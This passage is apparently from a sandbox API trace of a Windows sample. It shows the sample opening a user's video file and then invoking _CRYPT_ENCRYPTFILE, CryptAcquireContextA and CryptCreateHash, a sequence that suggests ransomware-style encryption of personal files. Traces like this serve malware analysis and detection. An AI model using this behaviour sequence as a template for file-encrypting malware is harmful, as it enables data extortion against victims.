dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.966] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0098.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca568, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.966] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0098.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\goxwto2-sz.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0098.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0098.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0098.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.969] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.971] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.971] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.972] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0098.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0098.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0098.974] CloseHandle (hObject=0x258) returned 1 [0098.975] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.975] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0098.975] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b1a42a0, ftCreationTime.dwHighDateTime=0x1d5ea66, ftLastAccessTime.dwLowDateTime=0xdc3b0be0, ftLastAccessTime.dwHighDateTime=0x1d5ea53, ftLastWriteTime.dwLowDateTime=0xdc3b0be0, ftLastWriteTime.dwHighDateTime=0x1d5ea53, nFileSizeHigh=0x0, nFileSizeLow=0xbbf4, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="gOxwTO2-sZ.mp4", cAlternateFileName="GOXWTO~1.MP4")) returned 0x41ac000 [0098.975] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0098.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0099.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0099.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0099.035] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0099.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0099.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.036] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0099.036] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0099.036] CryptCreateHash (in: hProv=0x41a5360, 